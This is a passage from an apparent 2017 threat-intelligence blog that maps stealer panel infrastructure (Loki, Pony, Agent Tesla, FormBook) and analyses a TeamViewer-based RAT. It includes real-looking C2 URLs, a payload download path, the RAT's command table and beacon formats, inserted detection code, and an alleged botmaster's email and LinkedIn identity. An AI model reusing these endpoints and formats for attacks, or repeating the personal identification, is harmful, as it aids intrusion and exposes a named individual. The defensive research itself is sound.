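Loki,http://street-wise.ru/v3/fre.php
Pony,http://street-men.ru/mmb/gate.php
Loki,http://street-men.ru/v3/fre.php
Loki,http://fyzeeconnect.ru/kingofkings/Panel/five/fre.php
Pony,http://fyzeeconnect.ru/maliki/gate.php
BetaBot,http://av.bitdefenderesupdate.ru/.av/logout.php
Atmos,http://chester.agenteinformaticos.ru/.scnerio/chusma/tetris.php?m=login
"""


def parse_rows(text):
    """Yield (family, host, directories, gate_script) for each 'family,url' line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or "," not in line:
            continue
        family, url = line.split(",", 1)
        parts = urlsplit(url.strip())
        segments = [s for s in parts.path.split("/") if s]
        # Last segment is the gate script (fre.php, gate.php...); the rest are directories.
        gate = segments[-1] if segments else ""
        yield family, parts.hostname or "", tuple(segments[:-1]), gate


def registrable_domain(host):
    """Naive eTLD+1 (last two labels); fine for the .ru hosts here, not for co.uk-style suffixes."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def group_by_domain(text):
    """registrable domain -> {host -> [(family, '/dir/path', gate_script), ...]}."""
    groups = defaultdict(lambda: defaultdict(list))
    for family, host, dirs, gate in parse_rows(text):
        groups[registrable_domain(host)][host].append((family, "/" + "/".join(dirs), gate))
    return groups


def families_per_domain(text):
    """registrable domain -> sorted families hosted there; shows the Pony+Loki pairing."""
    out = defaultdict(set)
    for family, host, _dirs, _gate in parse_rows(text):
        out[registrable_domain(host)].add(family)
    return {d: sorted(f) for d, f in out.items()}


def versioned_dir_pattern(text):
    """Hosts whose panels sit in a top-level 'vN' directory, a naming habit shared across domains."""
    hosts = set()
    for _family, host, dirs, _gate in parse_rows(text):
        if dirs and re.fullmatch(r"v\d+", dirs[0]):
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for domain, hosts in sorted(group_by_domain(SAMPLE_ROWS).items()):
        print(domain, {h: entries for h, entries in hosts.items()})
    print("families:", families_per_domain(SAMPLE_ROWS))
    print("vN habit:", versioned_dir_pattern(SAMPLE_ROWS))
```

Sorting by directory is what the post did in a spreadsheet; the version directories (v1, v2, v3...) and the Pony gate.php next to Loki fre.php on the same domain are exactly what the grouping brings out, while the Argentina actor's dot-prefixed directories (.av, .scnerio) fall into their own group.</br>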
There are a lot of different actors with different goals in this infra. We can find a looooot of Nigerian actors, a little bit of ransomware, some banking gangs or a little bit of point-of-sale malware gangs...</br>
You can find some related emails here: <a href="https://pastebin.com/PXzHNaSR">https://pastebin.com/PXzHNaSR</a>
<h1>Misc</h1>
Thanks to all these data, we can find funny stuff related to our infrastructure:</br>
<ul>
<li>
This is a guy asking for help on WHOIS and taking his malicious domain ("adtogroups.com", related to Atmos, Pony or BTC Miner) as an example <a href="https://serverfault.com/questions/841799/discrepancy-in-ns-information-between-dig-and-whois/841816">[1]</a> in March and <a href="http://linux.cloudypoint.com/forums/topic/networking-solved-discrepancy-in-ns-information-between-dig-and-whois/">[2]</a> in April</li>
<li>A very strange website that posts every week a list of domains related to our infrastructure <a href="http://www.hiperinfo.ru/news/domeny_sajty_otzyvy_zhaloby_rekomendacii_razmestit_podat_objavlenie_24_12_2017/2017-12-26-3712">[1]</a> </li>
<li>A guy on Hackforums seems to pwn his clients with something that contacts "tierastyle.co.uk" <a href="https://hackforums.net/showthread.php?tid=5507958&page=3">[1]</a></li>
<li>They like using obvious domain names like lokibotnet.ru, lokivshulk.info, atmosbot.xyz, achakeybase.com.de or azumebot.ru</li>
<li>One of our botmasters seems to have problems with a car <a href="http://www.nairaland.com/306281/free-honda-radio-unlock-codes/38#8282568">[1]</a></li>
<li>Another one uses his email for registering malicious domains and for LinkedIn (slyovic84@yahoo.com) <a href="https://www.linkedin.com/in/victor-ifeanyi-obasoanya-31800bab/">[1]</a></li>
</ul>
<center><iframe src="https://giphy.com/embed/14ea2sihlSXiaA" width="480" height="360" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
<h1>Conclusion</h1>
All these elements remind me of a malware-infrastructure-as-a-service. It's a good entry point for a lot of investigations :D</br>
Thanks to Maltego; after this quick test, I'm a big fan :D</br>
I only did retro hunting, so almost everything here is already known. With a little bit of active hunting, I'm sure you can find double or triple the number of panels. I saw new domains every day.</br>
</br>
</br>
Good luck and happy hunting :)</br>
</br>
Benkow_, 2017-12-10: An inside view of a password stealer campaign</br>
Hi,</br>
After a lightning talk at Botconf 2017, I'll try to describe here the full story behind the fav.al malware campaign.</br>
This is not something new: after looking on the internet I found an <a href="https://blog.fortinet.com/2016/05/06/new-fareit-variant-analysis">article</a> about this case in 2016, but I cannot find any article about the big picture of this case. So, here we go.</br>
</br>
<center><iframe src="https://giphy.com/embed/abDTQHKU9knUA" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
This is a verrrrry classic case in cybercrime. During the last 5 years I've seen a lot of cases like this one.
</br>
<h1>Starting line</h1>
By looking at public sandboxes I found a recurring domain hosting an Agent Tesla panel:</br>
<pre>
[+] 1eb54cd95709b62ebafa50b5dc051a41225b1de236bf8d269ceeac1087f9fbb1 POST -> t4st.fav.al/st/post.php
[+] 78ca1db4616ac10d6ae34a9f8b85b63966fad43fed0f40cf61d9fcde74892d94 POST -> t2st.fav.al/st/post.php
</pre>
<a href="https://blog.fortinet.com/2016/05/06/new-fareit-variant-analysis">fav.al</a> has been known since around May 2016 for hosting Pony, Formbook or Agent Tesla on many different subdomains.</br>
Before giving details on the infrastructure, a quick reminder about the malware used:</br>
<table border=1>
<tr>
<td>Family</td>
<td>Method</td>
<td>Gate</td>
<td>UserAgent</td>
</tr>
<tr>
<td>Pony</td>
<td>POST</td>
<td>gate.php</td>
<td><pre>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)</pre></td>
</tr>
<tr>
<td>Agent Tesla</td>
<td>POST</td>
<td>post.php</td>
<td><pre>Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)</pre></td>
</tr>
<tr>
<td>Form Book</td>
<td>GET / POST</td>
<td>config.php?id= / config.php</td>
<td><pre>Mozilla Firefox/4.0</pre></td>
</tr>
</table>
These malware are designed to crawl the victim's computer and search for saved credentials (FTP, RDP, email, websites...) in browsers, the registry, config files...</br>
Some good analyses:</br>
<b>Pony:</b></br>
<ul>
<li><a href="https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/">No money, but Pony! From a mail to a trojan horse</a></li>
<li><a href="http://www.xylibox.com/2013/05/pony-19-win32fareit.html">Pony 1.9 (Win32/Fareit)</a></li>
<li><a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1558">KernelMode thread</a></li>
</ul>
</br></br>
<b>Agent Tesla:</b></br>
<ul>
<li><a href="https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr">In-Depth Analysis of A New Variant of .NET Malware AgentTesla</a></li>
</ul>
</br></br>
<b>FormBook:</b></br>
<ul>
<li><a href="https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/" >The Formidable FormBook Form Grabber</a></li>
<li><a href="https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html">Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea</a></li>
</ul>
</br>
Almost 2 of these malware are open source: Pony and Agent Tesla leaked some time ago. I draw your attention to these very lame malware. Here, they used the default configuration for Pony and Agent Tesla: the gate is the default, the web requests are the default, etc. Take a look at how, in 2017, crooks used old lame Pony shit to infect people protected by "next gen anti virus".</br>
I've worked in the AV industry, I know how difficult it is to implement protections on Windows without false positives (thanks to all the fucking third party software developed by n00bs) but COME ON! PONY! </br>
<center><iframe src="https://giphy.com/embed/MwOuiiTfWfWgM" width="474" height="280" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Put a global hook (even in userland LOL), block every POST request to gate.php and whitelist browsers! Trust me, you will catch 80% of cybercrime... You can even propose a premium version which blocks POST on fre.php and you can be the best AV on Gartner...</br>
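An added example (not from the post) that turns the signature table above and the "block POST to gate.php, whitelist browsers" idea into detection logic over HTTP proxy log lines. The method, gate script and User-Agent per family are the ones in the table; the log format, client addresses, .example hostnames and the helpers looks_like_browser, classify and triage are constructed by me.</br>

```python
"""Classify proxy-log HTTP requests against the stealer signatures from the table in the post.

Added example. The log format and every hostname/address below are constructed for the demo;
the (method, gate script, User-Agent) signatures are the defaults listed in the post's table.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# family -> (allowed methods, gate script, exact default User-Agent), from the table in the post.
SIGNATURES = {
    "Pony": ({"POST"}, "gate.php",
             "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"),
    "Agent Tesla": ({"POST"}, "post.php",
                    "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) "
                    "Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"),
    "FormBook": ({"GET", "POST"}, "config.php", "Mozilla Firefox/4.0"),
}

# Gate scripts the post proposes blocking on POST: gate.php (Pony), fre.php (Loki), post.php (Agent Tesla).
GATE_SCRIPTS = {"gate.php", "fre.php", "post.php"}

# Constructed proxy log layout: timestamp client "METHOD url HTTP/x" status "User-Agent"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def looks_like_browser(ua):
    """Crude allow-list: a modern browser UA starts with 'Mozilla/5.0 (' and names an engine."""
    return bool(re.match(r"Mozilla/5\.0 \(.+\) .*(Chrome|Firefox|Safari|Edge)/\d", ua))


def classify(line):
    """Return 'Pony', 'Agent Tesla', 'FormBook', 'suspicious-gate', 'clean' or 'unparsed'."""
    m = LOG_RE.match(line)
    if not m:
        return "unparsed"
    method, ua = m["method"], m["ua"]
    script = urlsplit(m["url"]).path.rsplit("/", 1)[-1]
    # 1. Exact match on an unmodified default panel configuration (the case the post describes).
    for family, (methods, gate, sig_ua) in SIGNATURES.items():
        if method in methods and script == gate and ua == sig_ua:
            return family
    # 2. The post's heuristic: any POST to a known gate script from something that is not a browser.
    if method == "POST" and script in GATE_SCRIPTS and not looks_like_browser(ua):
        return "suspicious-gate"
    return "clean"


def triage(log_text):
    """Verdict counts over a whole log."""
    return Counter(classify(line) for line in log_text.splitlines() if line.strip())


# Constructed log: three default-config stealers, one Loki-style gate with a non-browser UA,
# and two requests from a real browser (one of them a POST to a gate.php on a legit site).
SAMPLE_LOG = """\
2017-09-13T10:01:02Z 10.0.0.5 "POST http://panel.example/ddob/gate.php HTTP/1.1" 200 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
2017-09-13T10:01:09Z 10.0.0.5 "POST http://panel.example/st/post.php HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
2017-09-13T10:02:41Z 10.0.0.7 "GET http://panel.example/fb/config.php?id=5 HTTP/1.1" 200 "Mozilla Firefox/4.0"
2017-09-13T10:03:15Z 10.0.0.9 "POST http://panel.example/v3/fre.php HTTP/1.1" 404 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2017-09-13T10:03:20Z 10.0.0.9 "GET http://www.example.org/index.html HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
2017-09-13T10:04:00Z 10.0.0.9 "POST http://www.example.org/gate.php HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
"""

if __name__ == "__main__":
    for entry in SAMPLE_LOG.splitlines():
        print(f"{classify(entry):16s} <- {entry[:90]}")
    print(triage(SAMPLE_LOG))
```

The exact-signature pass comes first on purpose: the default Agent Tesla User-Agent looks like a Firefox 4 build and would pass the browser allow-list, so the UA heuristic alone only catches the Pony-style and Loki-style requests, and a panel renamed away from post.php would slip through. That is the limit of the "block POST to gate.php" rule the post jokes about; as a proxy-log triage it still surfaces the default-config panels that made up the campaign.</br>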
</br>
</br>
<h1>kns1.al, fav.al and ddf.al as panel C&C since 2015</h1>
These crooks use only a few domains during the operation, and split victims across different subdomains.</br>
Each subdomain is configured with 2 panels, Formbook and {Pony|Agent Tesla}. In the past this gang used Zeus too.</br>
ddf.al has been known since around 2015-08-24 (bd1e28f55b2b335e27762425ebc70ffe17d468d7896bf2869bc0e5fa3e4220e2 - hxxp://files1.ddf.al/bin1.exe).
</br>
This looks like a kind of password-stealer-as-a-service infrastructure. </br>
<pre>
+-------------------+---------------+
|                   |               |
fav.al              ddf.al          kns1.al
|                   |               |
|                   |               |
401.fav.al          d1.ddf.al       bin1.kns1.al
402.fav.al          dbr.ddf.al      bon1.kns1.al
403.fav.al          f1.ddf.al       byn1.kns1.al
404.fav.al          files.ddf.al    dan1.kns1.al
ali1st.fav.al       files1.ddf.al   dan1-d.kns1.al
cent1.fav.al        frank1.ddf.al   dave1.kns1.al
char2.fav.al        111.dff.al      denko1.kns1.al
charles1.fav.al     owe1.ddf.al     dinu1.kns1.al
charles1-s.fav.al   owe2.ddf.al     gt1.kns1.al
daniel1.fav.al      owe3.ddf.al     jeff1.kns1.al
dave1.fav.al        legend1.ddf.al  jones1.kns1.al
db.fav.al           s1.ddf.al       ld1.kns1.al
dfg2.fav.al                         ld1files.kns1.al
dfg3.fav.al                         nasty1.kns1.al
dfg2-s.fav.al                       sailheats2.kns1.al
dino1.fav.al                        sheats1.kns1.al
ebu1.fav.al                         swain1.kns1.al
gabriel1-st.fav.al                  swain2.kns1.al
g1.fav.al                           tunapy1.kns1.al
g2.fav.al                           wal1.kns1.al
g3.fav.al                           wal2.kns1.al
gr2-s.fav.al                        wal3.kns1.al
heat1.fav.al                        wal4.kns1.al
idino2.fav.al                       wal5.kns1.al
ll1.fav.al
nwam1.fav.al
oct1.fav.al
oct3-st.fav.al
oct4-st.fav.al
pat1st.fav.al
patrick1.fav.al
riv1.fav.al
sail1st.fav.al
sail2st.fav.al
senator1st.fav.al
skadams1.fav.al
swaindino1.fav.al
t2st.fav.al
t3st.fav.al
t4st.fav.al
upd1.fav.al
upd3.fav.al
wal1.fav.al
</pre>
Some panel examples from <a href="http://cybercrime-tracker.net" >CCT</a>:</br>
<center>
<a href="http://cybercrime-tracker.net/index.php?search=ddf.al"><img src="https://i.imgur.com/SaHu88a.png" height=130px;/></a></br></br>
<a href="http://cybercrime-tracker.net/index.php?search=fav.al"><img src="https://i.imgur.com/unvryBj.png" height=700px;/></a></br></br>
</center>
</br>
This team doesn't use mass spreading; they select specific victims (we will understand how later). I have seen ~110 victims spread across many subdomains. They use password stealers to grab access to companies and try to steal money.</br>
Password stealers are only one part of their business. During data analysis I saw that they also did phishing, scams and CVV laundering.
</br></br>
<h1>An inside view</h1>
There is a repetitive behavior with lame botmasters: in many cases they infect themselves with their own malware. </br>
I suspect 2 reasons behind that:
<ul>
<li>The botmaster wants to know if everything is okay with the botnet and uses the self-infection as monitoring</li>
<li>The botmaster is a n00b</li>
</ul>
</br>
I think for this case, it's both :).</br>
On one panel, a victim appears to be one admin behind those Formbook & Agent Tesla panels.</br></br>
<a href="https://i.imgur.com/XUyqYUs.jpg"><img src="https://i.imgur.com/XUyqYUs.jpg" height=600px /></a></br>
</br>
This guy stayed infected from 09/13/2017 to 09/22/2017. I'll try to use the collected data to understand how he works and how the stolen data is used. Notice that doxing is not the point here.</br></br>
<h1>Autopwn</h1>
<h2>Victims</h2>
As the screenshots show, victims don't seem really targeted; they look for small businesses that are easy to hack:</br>
<a href="https://i.imgur.com/GrWPULH.jpg"><img src="https://i.imgur.com/GrWPULH.jpg" height=600px /></a></br>
</br>
They used already pwned email inboxes to spread the password stealer through a fake DocuSign notice:</br>
<a href="https://i.imgur.com/J6YiXFt.jpg"><img src="https://i.imgur.com/J6YiXFt.jpg" height=600px /></a></br>
With filename like "RBL-5019.Jpg,2800 PSI,1450 RPM.Jpg.exe" (81962cbfd51b64b51eeb4110ef139fd3c2791965621bf7ee65a422974a6ec4a1) or "Desktop.zip" (dfdc0b9e2cffead30a77bfffad6fb621f6eccaf6f5ace4b1d46bfe7b141a6028).</br>
</br>
After stealing passwords, this admin spies on the victims' activities and discusses with other people how he can hijack money: </br>
<a href="https://i.imgur.com/Gl7go4N.jpg"><img src="https://i.imgur.com/Gl7go4N.jpg" height=600px /></a></br></br>
<a href="https://i.imgur.com/0kDItpf.jpg"><img src="https://i.imgur.com/0kDItpf.jpg" height=600px /></a></br></br>
The majority of victims came from China and USA:</br>
<a href="https://i.imgur.com/ZSPmxdU.jpg"><img src="https://i.imgur.com/ZSPmxdU.jpg" height=600px /></a></br></br>
In this panel we can see 17 victims; after grabbing all the panels I counted 101 victims.</br></br>
<h2>Admin opsec</h2>
After a quick look we can easily understand that this guy looks like another Nigerian phisher. They often don't have any opsec: they have Facebook accounts with cash photos etc. because they know that there is no law or resources for arresting them.</br>
</br>
This is the desktop of this guy:</br>
<a href="https://i.imgur.com/WxlfqHi.jpg"><img src="https://i.imgur.com/WxlfqHi.jpg" height=600px /></a></br></br>
He uses hacked RDPs and SOCKS proxies to hide his IP:</br>
<a href="https://i.imgur.com/PhOM4Iw.jpg"><img src="https://i.imgur.com/PhOM4Iw.jpg" height=600px /></a></br></br>
</br>
Another interesting fact: apparently this guy doesn't really know how malware works. In the conversation below you can see a "MASTER" botmaster angry because somebody uploaded a malware sample to VirusTotal, and our guy apologizes:</br>
<center><a href="https://i.imgur.com/jgcVYR0.png"><img src="https://i.imgur.com/jgcVYR0.png" height=600px /></a></center></br></br>
<center><a href="https://i.imgur.com/iYX6PBO.png"><img src="https://i.imgur.com/iYX6PBO.png" height=600px /></a></center></br></br>
I have also seen that they used ICQ, Jabber and Skype to communicate. On the same day and with the same person, they switch between 3 programs, and they almost never use OTR.
</br>
</br>
<h1>Samples</h1>
The autopwned guy seems to have the ability to crypt malware. Almost every sample I've found has the same lame <a href="https://r3mrum.wordpress.com/2017/06/07/defeating-the-vb5-packer/"> VB5 packer</a>:</br>
<center><a href="https://i.imgur.com/d4HVYX5.png"><img src="https://i.imgur.com/d4HVYX5.png" height=600px /></a></center></br></br>
Some samples:
<ul>
<li>15775abe5573192d8abe6fc03240ef8d0afc94bbae22df5f940a789146295ebb - Agent Tesla - t1st.fav.al/st/post.php</li>
<li>81962cbfd51b64b51eeb4110ef139fd3c2791965621bf7ee65a422974a6ec4a1 - Agent Tesla - t4st.fav.al/st/post.php</li>
<li>f1b15760d728dc24cd87339be20cc4fe14359bf810f6866b3e21d7ade25846ed - Pony - riv1.fav.al/ddob/gate.php</li>
</ul>
(I cannot find any Formbook sample :/)
</br>
</br>
<h1>Conclusion</h1>
This kind of autopwn allows us to better understand how criminals work and how they can make a lot of money with a low investment.</br></br>
This is far from APTs, but the consequences are serious too. We see a lot of cases like this one every week on public sandboxes or support forums. This is a big money-stealing industry operating with impunity. I'm pretty sure that this guy is not a developer or system administrator. He doesn't know how a keylogger works; he is just one guy in a big community of panel operators.</br>
I understand that it's difficult to stop these criminals because of the laws of different countries, but we can maybe still make an effort on detecting lame malware, no?</br></br>
<center><iframe src="https://giphy.com/embed/3oz8xWM9VHFMduH91S" width="480" height="348" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
Benkow_ http://www.blogger.com/profile/00709869309686004611 noreply@blogger.com
tag:blogger.com,1999:blog-330713861169915021.post-2436190440202013380 2017-11-26T09:31:00.000-08:00 2017-12-01T04:40:03.953-08:00
<h1>Rules #22 - Copypasta is made to ruin every last bit of originality</h1>
Hi,</br>
3 months since the last blogpost, it's time for an update \o.</br>
</br>
By looking at some public sandbox feeds (ping <a href="https://twitter.com/fumik0_">@fumik0_</a>) I've found an unusual pattern, reminding me of old stuff:</br>
<code>
[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 GET -> rpc2.gdn/start/includes/tasks.php?hwid=71D7D653-460A-8BE7-264F6AF5</br>
[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 POST -> rpc2.gdn/start/inc.php/start/inc.php</br>
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e GET -> rpc2.gdn/start/includes/tasks.php?hwid=49C78CBD-165E-D0CF-474D92B</br>
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e POST -> rpc2.gdn/start/inc.php/start/inc.php</br>
</code>
</br>
This is a "RAT" (I don't know its name) that uses TeamViewer for spying on victims. </br>
<center><iframe src="https://giphy.com/embed/7NaMJtCu6x5Xa" width="480" height="346" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br></br>
<h1>Panel overview</h1>
Let's start with a usual panel overview.</br>
The interface is very simple, main page (click to enlarge):</br>
<center><a href="https://i.imgur.com/VIaJolj.png"><img src="https://i.imgur.com/VIaJolj.png" height=650px;/></a></center> </br>
With that, the botmaster can see whether somebody is connected to the infected machine, whether it has a webcam or mic, and basic system information.</br>
There were 125 bots in this CNC. </br>
The only other page is a quick settings page:</br>
<center><a href="https://i.imgur.com/qLj2xcZ.png"><img src="https://i.imgur.com/qLj2xcZ.png" height=300px;/></a></center></br>
This is very basic but enough for spying on people.</br></br>
Now let's look at the interesting part: the binary.
</br>
</br>
<h1>TeamViewer_Test_Pub</h1>
The sample came from an email with an attachment probably named "invoice.js" (e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6) that drops the RAT via <code>store4caroption-support.info/KKK.exe</code> (<a href="http://vxvault.net/ViriFiche.php?ID=36640">0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e</a>) </br></br>
The sample is a big package used to deploy TeamViewer and the RAT in <code>%APPDATA%\WebNet\</code> as hidden files:</br>
<center><a href="https://i.imgur.com/LhbRAwP.png"><img src="https://i.imgur.com/LhbRAwP.png" height=350px;/></a></center></br>
SensApi.dll (833ff902452e5fb10b39ef90c2f1ec96beb0d8d0486dc378eb07c10b3672276c) is the RAT controller.</br>
A quick static analysis with PE-bear shows us that this DLL has 4 exports:</br>
<center><a href="https://i.imgur.com/fqU1jAX.png"><img src="https://i.imgur.com/fqU1jAX.png" height=170px;/></a></center>
<ul>
<li>Entrypoint</li>
<li>IsDestinationReachableA</li>
<li>IsDestinationReachableW</li>
<li>isNetworkAlive</li>
</ul>
IsDestinationReachableA, IsDestinationReachableW and isNetworkAlive are just wrappers around the real SensApi.dll (the legitimate one, not the RAT :)</br>
<center><a href="https://i.imgur.com/EGYB2cc.png"><img src="https://i.imgur.com/EGYB2cc.png" height=410px;/></a></center> </br>
Before jumping into the EntryPoint let's have a quick look at the strings:</br>
<code>
rpc2.gdn</br>
num1.gdn</br>
process call create "%s"</br>
runas</br>
wmic</br>
TV started from Admin!!!</br>
uac</br>
This OS is not supported!!!</br>
\Policies\System</br>
\CurrentVersion</br>
\Windows</br>
\Microsoft</br>
Software</br>
%s%s%s%s%s</br>
EnableLUA</br>
Off</br>
High (Always Notify)</br>
Medium (Default Notification)</br>
Low (Default Notification)</br>
N/A</br>
error args</br>
Request successfully!!!</br>
cmdshow</br>
cmd</br>
COMSPEC</br>
/C</br>
run error</br>
wait...</br>
error</br>
closed. exitcode: %d (%s)</br>
tasklist</br>
(x64)</br>
(Win32)</br>
%s PID:%d%s</br>
plugin_start</br>
tiff</br>
plugin_del</br>
%s\%s.%s</br>
admin</br>
Yes</br>
UAC LVL: %s</br>
Elevated: %s</br>
RunAsAdmin: %s</br>
AdminGroup: %s</br>
webcam</br>
mic</br>
device is missing</br>
device is available</br>
off</br>
*.tiff</br>
Command not found!!!</br>
Error</br>
%s%s%s</br>
%06lX-%04lX-%04lX-%06lX</br>
%s%s</br>
HTTP/1.0</br>
Windows Server 2016</br>
Windows 10</br>
Windows Server 2012 R2</br>
Windows 8.1</br>
Windows Server 2012</br>
Windows 8</br>
Windows Server 2008 R2</br>
Windows 7</br>
Windows Server 2008</br>
Windows Vista</br>
Windows XP x64</br>
Windows Server 2003</br>
Windows XP</br>
Windows 2000</br>
unknown</br>
TeamViewer</br>
/start/includes/tasks.php?hwid=</br>
hwid=%s</br>
Content-Type: application/x-www-form-urlencoded</br>
start/includes/act_user.php</br>
hwid=%s&tv_id=%s&tv_pass=%s</br>
start/includes/pass_tv.php</br>
uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%s&mic=%s</br>
start/inc.php</br>
\start</br>
.exe</br>
open</br>
IsDestinationReachableA</br>
SensApi.dll</br>
IsDestinationReachableW</br>
IsNetworkAlive</br>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run</br>
TeamViewer_Desktop.exe</br>
Windows Core Services</br>
%s\%s</br>
.log</br>
.txt</br>
.tmp</br>
resource DLL</br>
TeamViewer</br>
TV_Marker</br>
TVWidget</br>
ATL:00BDE7D8</br>
ATL:00BE38B8</br>
</code></br>
This binary seems very verbose with some recurrent patterns like "!!!". </br>
I don't think it's common for a skid to deal with TeamViewer, so before reversing let's have a look on Google to see whether the dev copy-pasted some functions from Stack Overflow.</br>
By searching for strings like "High (Always Notify)" I found matching source code in a curious <a href="https://github.com/stonepans/TeamViewer_Test_Pub">GitHub account</a>:</br>
<center><a href="https://i.imgur.com/1cGiXSd.png"><img src="https://i.imgur.com/1cGiXSd.png" height=400px;/></a></center> </br>
<center><a href="https://i.imgur.com/BSB2qYt.png"><img src="https://i.imgur.com/BSB2qYt.png" height=650px;/></a></center> </br>
<h2>Commands</h2>
After looking deeper into this GitHub account and into the RAT, it looks like the RAT is a fork or an update of the source code in that account.</br>
We can find a lot of similar functions (click to enlarge):</br>
<center><a href="https://i.imgur.com/SpSUNsB.png"><img src="https://i.imgur.com/SpSUNsB.png" height=540px;/></a></center></br>
<center><a href="https://i.imgur.com/3lNKlc5.png"><img src="https://i.imgur.com/3lNKlc5.png" height=350px;/></a></center></br>
</br>
The RAT executes commands from the CNC via the function RunCmd() in main.cpp.</br>
Here are the available commands in both versions:</br>
<center>
<table border=1>
<tr>
<td>GitHub source</td><td>In-the-wild sample (IDA)</td><td>Details</td>
</tr>
<tr><td>setinterval</td><td></td><td>Set new interval for CNC ping</td></tr>
<tr><td>setserver</td><td></td><td>Set new CNC</td></tr>
<tr><td>setpass</td><td></td><td>Set new crypt config password</td></tr>
<tr><td>kill</td><td></td><td>Kill TeamViewer</td></tr>
<tr><td>runexe</td><td></td><td>Download and run exes</td></tr>
<tr><td>deldll</td><td></td><td>Delete dll</td></tr>
<tr><td>update</td><td></td><td>Update</td></tr>
<tr><td>rundll</td><td></td><td>Download and run dlls</td></tr>
<tr><td>reboot</td><td></td><td>Restart PC</td></tr>
<tr><td>poweroff</td><td></td><td>Shut down PC</td></tr>
<tr><td>restart</td><td></td><td>Restart Process</td></tr>
<tr><td>terminate</td><td></td><td>Kill process</td></tr>
<tr><td>mydir</td><td></td><td>Return current dir</td></tr>
<tr><td>admin</td><td>admin</td><td>Is process admin ?</td></tr>
<tr><td>tasklist</td><td>tasklist</td><td>Send tasks list</td></tr>
<tr><td>cmdwnd</td><td>cmdwnd</td><td>Run hidden cmd</td></tr>
<tr><td>cmd</td><td>cmd</td><td>Run cmd</td></tr>
<tr><td></td><td>uac</td><td>Re-run itself elevated via wmic process call create</td></tr>
<tr><td></td><td>plugin_start</td><td>Download, copy as .tiff and run an exe</td></tr>
<tr><td></td><td>plugin_del</td><td>Delete a file</td></tr>
<tr><td></td><td>webcam</td><td>Webcam on/off</td></tr>
<tr><td></td><td>mic</td><td>Mic on/off</td></tr>
</table>
</center>
As you can see, only a few commands are copied from the GitHub code. The major modifications are around dealing with elevated processes / UAC (because the original code seems really old).</br>
</br>
<h2>CNC communication</h2>
The in-the-wild RAT seems to have a different way of communicating with the CNC. It communicates over HTTP in plain text (the GitHub version used obfuscated HTTP requests). </br>
<ul>
<li><code>/includes/tasks.php - GET hwid=%s</code></li>
<li><code>/includes/act_user.php - POST hwid=%s&tv_id=%s&tv_pass=%s</code></li>
<li><code>/includes/inc.php - POST uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%s&mic=%s</code></li>
</ul>
</br>
There are 2 domains used as CNC: rpc2.gdn and num1.gdn.</br>
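As an added example (not the RAT's code nor the post's own), here is a small Python checker that flags these beacons in an HTTP proxy or sandbox log, using the three endpoints, the POST field names and the hwid format string "%06lX-%04lX-%04lX-%06lX" from the strings dump above; the one-request-per-line log format and the sample lines are constructed for the example, with the same shape as the sandbox feed lines at the top of the post.

```python
"""Flag TeamViewer-RAT beacons in HTTP logs.

Added example, not the RAT's code or the post's own. The endpoints, POST field
names and the hwid format string "%06lX-%04lX-%04lX-%06lX" come from the
strings dump in the post; the log format and the sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# CNC domains named in the post.
CNC_HOSTS = {"rpc2.gdn", "num1.gdn"}

# "%06lX" is a *minimum* width, so each group can grow to 8 hex digits
# (the sandbox feed shows 71D7D653-460A-8BE7-264F6AF5).
HWID_RE = re.compile(r"^[0-9A-F]{6,8}-[0-9A-F]{4,8}-[0-9A-F]{4,8}-[0-9A-F]{6,8}$")

# endpoint prefix -> (method, fields the beacon always carries)
BEACONS = {
    "/start/includes/tasks.php": ("GET", {"hwid"}),
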